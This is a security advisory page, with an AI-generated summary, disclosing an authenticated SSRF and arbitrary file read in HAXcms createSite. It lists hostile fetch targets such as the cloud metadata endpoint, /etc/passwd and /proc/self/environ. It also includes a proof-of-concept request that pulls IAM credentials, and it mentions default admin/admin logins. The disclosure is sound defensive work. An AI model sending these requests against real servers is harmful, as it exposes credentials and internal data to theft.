VYPR
← All advisories
High severity7.1GHSA Advisory· Published May 19, 2026

HAXcms createSite SSRF Enables Arbitrary File Read

CVE-2026-46393

Description

Summary

An authenticated Server-Side Request Forgery (SSRF) vulnerability in HAXcms allows users to fetch arbitrary internal or local resources and write the responses to a web-accessible directory, enabling arbitrary file read and internal network access.

Details

The createSite endpoint in HAXcms (v11.0.6) accepts a build.files parameter that allows an authenticated user to supply arbitrary URLs or local file paths. This input is processed without validation and ultimately fetched server-side using file_get_contents().

The data flow is as follows: - User input (build.files) is processed via object_to_array() into a PHP array - Assigned to $filesToDownload in Operations.php (line 2626) - Iterated over in Operations.php (line 2730), where each entry is passed to HAXCMSFile::save() with bulk-import enabled

In HAXCMSFile.php (line 30), the following occurs: ``php file_get_contents($upload['tmp_name']); ``

Here, tmp_name is attacker-controlled and may contain:

  • External URLs (http://attacker.com)
  • Internal services (http://127.0.0.1)
  • Cloud metadata endpoints (http://169.254.169.254)
  • Local file paths (/etc/passwd, /proc/self/environ)

The bulk-import flag bypasses is_uploaded_file() validation, which normally ensures the file originates from a legitimate upload. The only restriction is an extension whitelist based on the filename (array key), which is fully attacker-controlled.

There are no restrictions on:

  • URL schemes (http, file, gopher, etc.)
  • Destination IP ranges (internal, loopback, metadata services)
  • Response content

All fetched content is written to: `` sites//files/ ``

and is accessible via the web.

PoC

Prerequisites:

  • Authenticated session (default credentials: admin/admin on fresh installs)
  • Valid JWT and CSRF token

Step 1: Log in and capture JWT + CSRF token

Step 2: Send crafted request: `` POST /createSite HTTP/1.1 Host: target Authorization: Bearer [JWT] X-CSRF-Token: [TOKEN] Content-Type: application/json { "site": { "name": "poc" }, "build": { "files": { "poc.txt": { "tmp_name": "http://169.254.169.254/latest/meta-data/iam/security-credentials/" } } } } ``

Step 3: Retrieve response: `` GET /sites/poc/files/poc.txt ``

The response will contain the fetched content (e.g., cloud credentials or internal service data).

Impact

  • SSRF enabling access to internal network services
  • Arbitrary file read via local filesystem paths
  • Cloud credential exposure through metadata endpoints
  • Data exfiltration via web-accessible file storage

Any authenticated user can exploit this to access sensitive server or infrastructure data, potentially leading to full system or cloud environment compromise.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Authenticated SSRF in HAXcms createSite endpoint allows arbitrary file read and internal network access via uncontrolled URL/file paths.

Vulnerability

The createSite endpoint in HAXcms v11.0.6 accepts a build.files parameter that allows an authenticated user to supply arbitrary URLs or local file paths. This input is processed via object_to_array() and passed to HAXCMSFile::save() with bulk-import enabled, bypassing is_uploaded_file() validation. The only restriction is an extension whitelist based on the filename key, which is attacker-controlled. [2][3]

Exploitation

An attacker with an authenticated session (default credentials admin/admin on fresh installs) can craft a POST request to /createSite with a JSON payload containing arbitrary URLs or file paths in build.files. The server fetches the resource using file_get_contents() and writes the response to sites//files/, which is web-accessible. No restrictions on URL schemes or IP ranges exist. [2][3]

Impact

An attacker can read arbitrary local files (e.g., /etc/passwd, /proc/self/environ) and access internal network services (e.g., cloud metadata endpoints at http://169.254.169.254). The fetched content is stored in a publicly accessible directory, enabling information disclosure and further internal network reconnaissance. [2][3]

Mitigation

As of the publication date, no patch has been released. The issue is tracked in the HAXcms issue repository [1]. Until a fix is available, administrators should restrict authenticated access, change default credentials, and consider network-level controls to limit outbound HTTP requests from the server. [2][3]

References
  1. GitHub - haxtheweb/issues: Issue queue for hax, haxcms, elmsln, lrnwebcomponents, wcfactory, websites and more.
  2. CVE-2026-46393 - GitHub Advisory Database
  3. HAXcms createSite SSRF Enables Arbitrary File Read

AI Insight generated on May 21, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

2

Patches

0

No patches discovered yet.

Vulnerability mechanics

AI mechanics synthesis has not run for this CVE yet.

References

2

News mentions

0

No linked articles in our index yet.